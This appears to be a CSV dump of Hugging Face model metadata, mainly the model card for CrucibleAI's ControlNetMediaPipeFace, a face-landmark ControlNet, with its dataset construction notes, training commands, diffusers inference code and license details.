","{""id"": ""TheBloke/CausalLM-14B-GGUF"", ""author"": ""TheBloke"", ""sha"": ""fe9e233d83851a081204be55a8812bb4af1da2f9"", ""last_modified"": ""2023-10-23 14:08:54+00:00"", ""created_at"": ""2023-10-22 16:28:29+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 4660, ""downloads_all_time"": null, ""likes"": 185, ""library_name"": ""transformers"", ""gguf"": {""total"": 14166676480, ""architecture"": ""llama"", ""context_length"": 8192}, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""gguf"", ""llama"", ""llama2"", ""qwen"", ""text-generation"", ""en"", ""zh"", ""dataset:JosephusCheung/GuanacoDataset"", ""dataset:Open-Orca/OpenOrca"", ""dataset:stingning/ultrachat"", ""dataset:meta-math/MetaMathQA"", ""dataset:liuhaotian/LLaVA-Instruct-150K"", ""dataset:jondurbin/airoboros-3.1"", ""dataset:WizardLM/WizardLM_evol_instruct_V2_196k"", ""dataset:RyokoAI/ShareGPT52K"", ""dataset:RyokoAI/Fandom23K"", ""dataset:milashkaarshif/MoeGirlPedia_wikitext_raw_archive"", ""dataset:wikipedia"", ""dataset:wiki_lingua"", ""dataset:fnlp/moss-003-sft-data"", ""dataset:garage-bAInd/Open-Platypus"", ""dataset:LDJnr/Puffin"", ""dataset:openbmb/llava_zh"", ""dataset:BAAI/COIG"", ""dataset:TigerResearch/tigerbot-zhihu-zh-10k"", ""dataset:liwu/MNBVC"", ""dataset:teknium/openhermes"", ""base_model:CausalLM/14B"", ""base_model:quantized:CausalLM/14B"", ""license:wtfpl"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: CausalLM/14B\ndatasets:\n- JosephusCheung/GuanacoDataset\n- Open-Orca/OpenOrca\n- stingning/ultrachat\n- meta-math/MetaMathQA\n- liuhaotian/LLaVA-Instruct-150K\n- jondurbin/airoboros-3.1\n- WizardLM/WizardLM_evol_instruct_V2_196k\n- RyokoAI/ShareGPT52K\n- RyokoAI/Fandom23K\n- milashkaarshif/MoeGirlPedia_wikitext_raw_archive\n- wikipedia\n- wiki_lingua\n- fnlp/moss-003-sft-data\n- garage-bAInd/Open-Platypus\n- LDJnr/Puffin\n- openbmb/llava_zh\n- BAAI/COIG\n- TigerResearch/tigerbot-zhihu-zh-10k\n- liwu/MNBVC\n- teknium/openhermes\nlanguage:\n- en\n- zh\nlicense: wtfpl\nmodel_name: CausalLM 14B\npipeline_tag: text-generation\ntags:\n- llama\n- llama2\n- qwen\ninference: false\nmodel_creator: CausalLM\nmodel_type: llama\nprompt_template: '<|im_start|>system\n\n {system_message}<|im_end|>\n\n <|im_start|>user\n\n {prompt}<|im_end|>\n\n <|im_start|>assistant\n\n '\nquantized_by: TheBloke"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""model_type"": ""llama""}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Notice', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='USE_POLICY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='causallm_14b.Q4_0.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='causallm_14b.Q4_1.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='causallm_14b.Q5_0.gguf', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='causallm_14b.Q5_1.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='causallm_14b.Q8_0.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Limour/llama-python-streamingllm"", ""NLPark/llama-python-streamingllm""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-10-23 14:08:54+00:00"", ""cardData"": ""base_model: CausalLM/14B\ndatasets:\n- JosephusCheung/GuanacoDataset\n- Open-Orca/OpenOrca\n- stingning/ultrachat\n- meta-math/MetaMathQA\n- liuhaotian/LLaVA-Instruct-150K\n- jondurbin/airoboros-3.1\n- WizardLM/WizardLM_evol_instruct_V2_196k\n- RyokoAI/ShareGPT52K\n- RyokoAI/Fandom23K\n- milashkaarshif/MoeGirlPedia_wikitext_raw_archive\n- wikipedia\n- wiki_lingua\n- fnlp/moss-003-sft-data\n- garage-bAInd/Open-Platypus\n- LDJnr/Puffin\n- openbmb/llava_zh\n- BAAI/COIG\n- TigerResearch/tigerbot-zhihu-zh-10k\n- liwu/MNBVC\n- teknium/openhermes\nlanguage:\n- en\n- zh\nlicense: wtfpl\nmodel_name: CausalLM 14B\npipeline_tag: text-generation\ntags:\n- llama\n- llama2\n- qwen\ninference: false\nmodel_creator: CausalLM\nmodel_type: llama\nprompt_template: '<|im_start|>system\n\n {system_message}<|im_end|>\n\n <|im_start|>user\n\n {prompt}<|im_end|>\n\n <|im_start|>assistant\n\n '\nquantized_by: TheBloke"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""65354dada2c81a3d29a30494"", ""modelId"": ""TheBloke/CausalLM-14B-GGUF"", ""usedStorage"": 105562002400}",0,,0,,0,,0,,0,"Limour/llama-python-streamingllm, NLPark/llama-python-streamingllm, huggingface/InferenceSupport/discussions/new?title=TheBloke/CausalLM-14B-GGUF&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BTheBloke%2FCausalLM-14B-GGUF%5D(%2FTheBloke%2FCausalLM-14B-GGUF)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",3
|
ClinicalBERT_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
CodeLlama-7b-hf_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
ControlNetMediaPipeFace_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv
ADDED
|
@@ -0,0 +1,213 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
CrucibleAI/ControlNetMediaPipeFace,"---
|
| 3 |
+
language:
|
| 4 |
+
- en
|
| 5 |
+
thumbnail: ''
|
| 6 |
+
tags:
|
| 7 |
+
- controlnet
|
| 8 |
+
- laion
|
| 9 |
+
- face
|
| 10 |
+
- mediapipe
|
| 11 |
+
- image-to-image
|
| 12 |
+
license: openrail
|
| 13 |
+
base_model: stabilityai/stable-diffusion-2-1-base
|
| 14 |
+
datasets:
|
| 15 |
+
- LAION-Face
|
| 16 |
+
- LAION
|
| 17 |
+
pipeline_tag: image-to-image
|
| 18 |
+
---
|
| 19 |
+
|
| 20 |
+
# ControlNet LAION Face Dataset
|
| 21 |
+
|
| 22 |
+
## Table of Contents:
|
| 23 |
+
- Overview: Samples, Contents, and Construction
|
| 24 |
+
- Usage: Downloading, Training, and Inference
|
| 25 |
+
- License
|
| 26 |
+
- Credits and Thanks
|
| 27 |
+
|
| 28 |
+
# Overview:
|
| 29 |
+
|
| 30 |
+
This dataset is designed to train a ControlNet with human facial expressions. It includes keypoints for pupils, allowing gaze direction to be controlled. Training has been tested on Stable Diffusion v2.1 base (512) and Stable Diffusion v1.5.
|
| 31 |
+
|
| 32 |
+
## Samples:
|
| 33 |
+
|
| 34 |
+
Cherry-picked from ControlNet + Stable Diffusion v2.1 Base
|
| 35 |
+
|
| 36 |
+
|Input|Face Detection|Output|
|
| 37 |
+
|:---:|:---:|:---:|
|
| 38 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/happy_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/happy_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/happy_result.png"">|
|
| 39 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/neutral_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/neutral_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/neutral_result.png"">|
|
| 40 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sad_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sad_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sad_result.png"">|
|
| 41 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/screaming_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/screaming_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/screaming_result.png"">|
|
| 42 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sideways_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sideways_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sideways_result.png"">|
|
| 43 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/surprised_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/surprised_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/surprised_result.png"">|
|
| 44 |
+
|
| 45 |
+
Images with multiple faces are also supported:
|
| 46 |
+
|
| 47 |
+
<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/family_source.jpg"">
|
| 48 |
+
|
| 49 |
+
<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/family_annotation.png"">
|
| 50 |
+
|
| 51 |
+
<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/family_result.png"">
|
| 52 |
+
|
| 53 |
+
|
| 54 |
+
## Dataset Contents:
|
| 55 |
+
|
| 56 |
+
- train_laion_face.py - Entrypoint for ControlNet training.
|
| 57 |
+
- laion_face_dataset.py - Code for performing dataset iteration. Cropping and resizing happens here.
|
| 58 |
+
- tool_download_face_targets.py - A tool to read metadata.json and populate the target folder.
|
| 59 |
+
- tool_generate_face_poses.py - The original file used to generate the source images. Included for reproducibility, but not required for training.
|
| 60 |
+
- training/laion-face-processed/prompt.jsonl - Read by laion_face_dataset. Includes prompts for the images.
|
| 61 |
+
- training/laion-face-processed/metadata.json - Excerpts from LAION for the relevant data. Also used for downloading the target dataset.
|
| 62 |
+
- training/laion-face-processed/source/xxxxxxxxx.jpg - Images with detections performed. Generated from the target images.
|
| 63 |
+
- training/laion-face-processed/target/xxxxxxxxx.jpg - Selected images from LAION Face.
|
| 64 |
+
|
| 65 |
+
## Dataset Construction:
|
| 66 |
+
|
| 67 |
+
Source images were generated by pulling slice 00000 from LAION Face and passing them through MediaPipe's face detector with special configuration parameters.
|
| 68 |
+
|
| 69 |
+
The colors and line thicknesses used for MediaPipe are as follows:
|
| 70 |
+
|
| 71 |
+
```
|
| 72 |
+
# Assumed import: DrawingSpec comes from MediaPipe's drawing utilities.
import mediapipe as mp
DrawingSpec = mp.solutions.drawing_utils.DrawingSpec

f_thick = 2
|
| 73 |
+
f_rad = 1
|
| 74 |
+
right_iris_draw = DrawingSpec(color=(10, 200, 250), thickness=f_thick, circle_radius=f_rad)
|
| 75 |
+
right_eye_draw = DrawingSpec(color=(10, 200, 180), thickness=f_thick, circle_radius=f_rad)
|
| 76 |
+
right_eyebrow_draw = DrawingSpec(color=(10, 220, 180), thickness=f_thick, circle_radius=f_rad)
|
| 77 |
+
left_iris_draw = DrawingSpec(color=(250, 200, 10), thickness=f_thick, circle_radius=f_rad)
|
| 78 |
+
left_eye_draw = DrawingSpec(color=(180, 200, 10), thickness=f_thick, circle_radius=f_rad)
|
| 79 |
+
left_eyebrow_draw = DrawingSpec(color=(180, 220, 10), thickness=f_thick, circle_radius=f_rad)
|
| 80 |
+
mouth_draw = DrawingSpec(color=(10, 180, 10), thickness=f_thick, circle_radius=f_rad)
|
| 81 |
+
head_draw = DrawingSpec(color=(10, 200, 10), thickness=f_thick, circle_radius=f_rad)
|
| 82 |
+
|
| 83 |
+
iris_landmark_spec = {468: right_iris_draw, 473: left_iris_draw}
|
| 84 |
+
```
|
| 85 |
+
|
| 86 |
+
We have implemented a method named `draw_pupils` which modifies some functionality from MediaPipe. It exists as a stopgap until some pending changes are merged.
|
| 87 |
+
|
| 88 |
+
|
| 89 |
+
# Usage:
|
| 90 |
+
|
| 91 |
+
The containing ZIP file should be decompressed into the root of the ControlNet directory. The `train_laion_face.py`, `laion_face_dataset.py`, and other `.py` files should sit adjacent to `tutorial_train.py` and `tutorial_train_sd21.py`. We are assuming a checkout of the ControlNet repo at 0acb7e5, but there is no direct dependency on the repository.
|
| 92 |
+
|
| 93 |
+
## Downloading:
|
| 94 |
+
|
| 95 |
+
For copyright reasons, we cannot include the original target files. We have provided a script (tool_download_face_targets.py) which will read from training/laion-face-processed/metadata.json and populate the target folder. This file has no requirements, but will use tqdm if it is installed.
|
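
As a hypothetical sketch of what such a downloader does (the actual script is `tool_download_face_targets.py`; the metadata layout and the `url` field below are assumptions, not taken from the file):

```py
# Hypothetical downloader sketch; assumes metadata.json maps sample ids to
# LAION entries containing a 'url' field. The real tool may differ.
import json
import os
import urllib.request

with open('training/laion-face-processed/metadata.json') as f:
    metadata = json.load(f)

os.makedirs('training/laion-face-processed/target', exist_ok=True)
for sample_id, entry in metadata.items():
    dest = f'training/laion-face-processed/target/{sample_id}.jpg'
    if not os.path.exists(dest):  # skip files that were already downloaded
        urllib.request.urlretrieve(entry['url'], dest)
```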
| 96 |
+
|
| 97 |
+
## Training:
|
| 98 |
+
|
| 99 |
+
When the targets folder is fully populated, training can be run on a machine with at least 24 gigabytes of VRAM. Our model was trained for 200 hours (four epochs) on an A6000.
|
| 100 |
+
|
| 101 |
+
```bash
|
| 102 |
+
python tool_add_control.py ./models/v1-5-pruned-emaonly.ckpt ./models/controlnet_sd15_laion_face.ckpt
|
| 103 |
+
python ./train_laion_face_sd15.py
|
| 104 |
+
```
|
| 105 |
+
|
| 106 |
+
## Inference:
|
| 107 |
+
|
| 108 |
+
We have provided `gradio_face2image.py`. Update the following two lines to point them to your trained model.
|
| 109 |
+
|
| 110 |
+
```
|
| 111 |
+
model = create_model('./models/cldm_v21.yaml').cpu() # If you fine-tune on SD2.1 base, this does not need to change.
|
| 112 |
+
model.load_state_dict(load_state_dict('./models/control_sd21_openpose.pth', location='cuda'))
|
| 113 |
+
```
|
| 114 |
+
|
| 115 |
+
The model has some limitations: while it is empirically better at tracking gaze and mouth poses than previous attempts, it may still ignore controls. Adding details to the prompt, like ""looking right"", can abate bad behavior.
|
| 116 |
+
|
| 117 |
+
## 🧨 Diffusers
|
| 118 |
+
|
| 119 |
+
It is recommended to use the checkpoint with [Stable Diffusion 2.1 - Base](https://huggingface.co/stabilityai/stable-diffusion-2-1-base) as the checkpoint has been trained on it.
|
| 120 |
+
Experimentally, the checkpoint can be used with other diffusion models, such as DreamBoothed Stable Diffusion.
|
| 121 |
+
|
| 122 |
+
To use with Stable Diffusion 1.5, insert `subfolder=""diffusion_sd15""` into the `from_pretrained` arguments. A v1.5 half-precision variant is provided but untested.
|
| 123 |
+
|
| 124 |
+
1. Install `diffusers` and related packages:
|
| 125 |
+
```
|
| 126 |
+
$ pip install diffusers transformers accelerate
|
| 127 |
+
```
|
| 128 |
+
|
| 129 |
+
2. Run code:
|
| 130 |
+
```py
|
| 131 |
+
from PIL import Image
|
| 132 |
+
import numpy as np
|
| 133 |
+
import torch
|
| 134 |
+
from diffusers import StableDiffusionControlNetPipeline, ControlNetModel, UniPCMultistepScheduler
|
| 135 |
+
from diffusers.utils import load_image
|
| 136 |
+
|
| 137 |
+
image = load_image(
|
| 138 |
+
""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/family_annotation.png""
|
| 139 |
+
)
|
| 140 |
+
|
| 141 |
+
# Stable Diffusion 2.1-base:
|
| 142 |
+
controlnet = ControlNetModel.from_pretrained(""CrucibleAI/ControlNetMediaPipeFace"", torch_dtype=torch.float16, variant=""fp16"")
|
| 143 |
+
pipe = StableDiffusionControlNetPipeline.from_pretrained(
|
| 144 |
+
""stabilityai/stable-diffusion-2-1-base"", controlnet=controlnet, safety_checker=None, torch_dtype=torch.float16
|
| 145 |
+
)
|
| 146 |
+
# OR
|
| 147 |
+
# Stable Diffusion 1.5:
|
| 148 |
+
controlnet = ControlNetModel.from_pretrained(""CrucibleAI/ControlNetMediaPipeFace"", subfolder=""diffusion_sd15"")
|
| 149 |
+
pipe = StableDiffusionControlNetPipeline.from_pretrained(""runwayml/stable-diffusion-v1-5"", controlnet=controlnet, safety_checker=None)
|
| 150 |
+
|
| 151 |
+
pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
|
| 152 |
+
|
| 153 |
+
# Remove if you do not have xformers installed
|
| 154 |
+
# see https://huggingface.co/docs/diffusers/v0.13.0/en/optimization/xformers#installing-xformers
|
| 155 |
+
# for installation instructions
|
| 156 |
+
pipe.enable_xformers_memory_efficient_attention()
|
| 157 |
+
pipe.enable_model_cpu_offload()
|
| 158 |
+
|
| 159 |
+
image = pipe(""a happy family at a dentist advertisement"", image=image, num_inference_steps=30).images[0]
|
| 160 |
+
image.save('./images.png')
|
| 161 |
+
```
|
| 162 |
+
|
| 163 |
+
|
| 164 |
+
# License:
|
| 165 |
+
|
| 166 |
+
### Source Images: (/training/laion-face-processed/source/)
|
| 167 |
+
This work is marked with CC0 1.0. To view a copy of this license, visit http://creativecommons.org/publicdomain/zero/1.0
|
| 168 |
+
|
| 169 |
+
### Trained Models:
|
| 170 |
+
Our trained ControlNet checkpoints are released under CreativeML Open RAIL-M.
|
| 171 |
+
|
| 172 |
+
### Source Code:
|
| 173 |
+
lllyasviel/ControlNet is licensed under the Apache License 2.0
|
| 174 |
+
|
| 175 |
+
Our modifications are released under the same license.
|
| 176 |
+
|
| 177 |
+
|
| 178 |
+
# Credits and Thanks:
|
| 179 |
+
|
| 180 |
+
Greatest thanks to Zhang et al. for ControlNet, Rombach et al. (StabilityAI) for Stable Diffusion, and Schuhmann et al. for LAION.
|
| 181 |
+
|
| 182 |
+
Sample images for this document were obtained from Unsplash and are CC0.
|
| 183 |
+
|
| 184 |
+
```
|
| 185 |
+
@misc{zhang2023adding,
|
| 186 |
+
title={Adding Conditional Control to Text-to-Image Diffusion Models},
|
| 187 |
+
author={Lvmin Zhang and Maneesh Agrawala},
|
| 188 |
+
year={2023},
|
| 189 |
+
eprint={2302.05543},
|
| 190 |
+
archivePrefix={arXiv},
|
| 191 |
+
primaryClass={cs.CV}
|
| 192 |
+
}
|
| 193 |
+
|
| 194 |
+
@misc{rombach2021highresolution,
|
| 195 |
+
title={High-Resolution Image Synthesis with Latent Diffusion Models},
|
| 196 |
+
author={Robin Rombach and Andreas Blattmann and Dominik Lorenz and Patrick Esser and Björn Ommer},
|
| 197 |
+
year={2021},
|
| 198 |
+
eprint={2112.10752},
|
| 199 |
+
archivePrefix={arXiv},
|
| 200 |
+
primaryClass={cs.CV}
|
| 201 |
+
}
|
| 202 |
+
|
| 203 |
+
@misc{schuhmann2022laion5b,
|
| 204 |
+
title={LAION-5B: An open large-scale dataset for training next generation image-text models},
|
| 205 |
+
author={Christoph Schuhmann and Romain Beaumont and Richard Vencu and Cade Gordon and Ross Wightman and Mehdi Cherti and Theo Coombes and Aarush Katta and Clayton Mullis and Mitchell Wortsman and Patrick Schramowski and Srivatsa Kundurthy and Katherine Crowson and Ludwig Schmidt and Robert Kaczmarczyk and Jenia Jitsev},
|
| 206 |
+
year={2022},
|
| 207 |
+
eprint={2210.08402},
|
| 208 |
+
archivePrefix={arXiv},
|
| 209 |
+
primaryClass={cs.CV}
|
| 210 |
+
}
|
| 211 |
+
```
|
| 212 |
+
|
| 213 |
+
This project was made possible by Crucible AI.","{""id"": ""CrucibleAI/ControlNetMediaPipeFace"", ""author"": ""CrucibleAI"", ""sha"": ""f6ed75cc495674bea8bf7409ef3d0e5bfb7d8c90"", ""last_modified"": ""2023-05-19 19:32:02+00:00"", ""created_at"": ""2023-03-30 18:28:07+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 1595, ""downloads_all_time"": null, ""likes"": 566, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""safetensors"", ""controlnet"", ""laion"", ""face"", ""mediapipe"", ""image-to-image"", ""en"", ""dataset:LAION-Face"", ""dataset:LAION"", ""arxiv:2302.05543"", ""arxiv:2112.10752"", ""arxiv:2210.08402"", ""base_model:stabilityai/stable-diffusion-2-1-base"", ""base_model:adapter:stabilityai/stable-diffusion-2-1-base"", ""license:openrail"", ""region:us""], ""pipeline_tag"": ""image-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: stabilityai/stable-diffusion-2-1-base\ndatasets:\n- LAION-Face\n- LAION\nlanguage:\n- en\nlicense: openrail\npipeline_tag: image-to-image\ntags:\n- controlnet\n- laion\n- face\n- mediapipe\n- image-to-image"", ""widget_data"": null, ""model_index"": null, ""config"": {}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd15_mediapipe_face.full.ckpt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd15_mediapipe_face.pth', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd15_mediapipe_face.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd15_mediapipe_face.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd21_mediapipe_face.full.ckpt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd21_mediapipe_face.pth', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd21_mediapipe_face.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='control_v2p_sd21_mediapipe_face.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_pytorch_model.fp16.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_pytorch_model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_sd15/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_sd15/diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_sd15/diffusion_pytorch_model.fp16.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='diffusion_sd15/diffusion_pytorch_model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='gradio_face2image.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='laion_face_common.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='laion_face_dataset.py', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='samples_laion_face_dataset/family_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/family_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/family_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/happy_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/happy_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/happy_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/neutral_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/neutral_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/neutral_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sad_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sad_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sad_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/screaming_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/screaming_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/screaming_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sideways_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sideways_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/sideways_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/surprised_annotation.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/surprised_result.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples_laion_face_dataset/surprised_source.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tool_download_face_targets.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tool_generate_face_poses.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train_laion_face.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train_laion_face_sd15.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [""CrucibleAI/ControlNetMediaPipeFaceSD21"", ""KumaPower/AvatarArtist"", ""TheNetherWatcher/Vid2Vid-using-Text-prompt"", ""MA9149210776/CrucibleAI-ControlNetMediaPipeFace"", ""RickyD/CrucibleAI-ControlNetMediaPipeFaceStreamlit"", ""krnl/venereital-IA-23-space"", ""nehho/CrucibleAI-ControlNetMediaPipeFace"", ""teganmosi/CrucibleAI-ControlNetMediaPipeFace"", ""tellview/CrucibleAI-ControlNetMediaPipeFace"", ""aixk/CrucibleAI-ControlNetMediaPipeFace"", ""satyac/CrucibleAI-ControlNetMediaPipeFace"", ""tidy/CrucibleAI-ControlNetMediaPipeFace"", ""Rooni/ImgToImg"", ""ZeLeL/CrucibleAI-ControlNetMediaPipeFace"", ""Akay2024/CrucibleAI-ControlNetMediaPipeFace"", ""Testboydood/CrucibleAI-ControlNetMediaPipeFace"", ""anonicloudmail/test"", ""hohuiking/CrucibleAI-ControlNetMediaPipeFace"", 
""tejas56789ce/CrucibleAI-ControlNetMediaPipeFace""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-05-19 19:32:02+00:00"", ""cardData"": ""base_model: stabilityai/stable-diffusion-2-1-base\ndatasets:\n- LAION-Face\n- LAION\nlanguage:\n- en\nlicense: openrail\npipeline_tag: image-to-image\ntags:\n- controlnet\n- laion\n- face\n- mediapipe\n- image-to-image"", ""transformersInfo"": null, ""_id"": ""6425d4b7d0a9d069e8e0ebbc"", ""modelId"": ""CrucibleAI/ControlNetMediaPipeFace"", ""usedStorage"": 34147689491}",0,,0,,0,,0,,0,"CrucibleAI/ControlNetMediaPipeFaceSD21, KumaPower/AvatarArtist, MA9149210776/CrucibleAI-ControlNetMediaPipeFace, RickyD/CrucibleAI-ControlNetMediaPipeFaceStreamlit, TheNetherWatcher/Vid2Vid-using-Text-prompt, aixk/CrucibleAI-ControlNetMediaPipeFace, 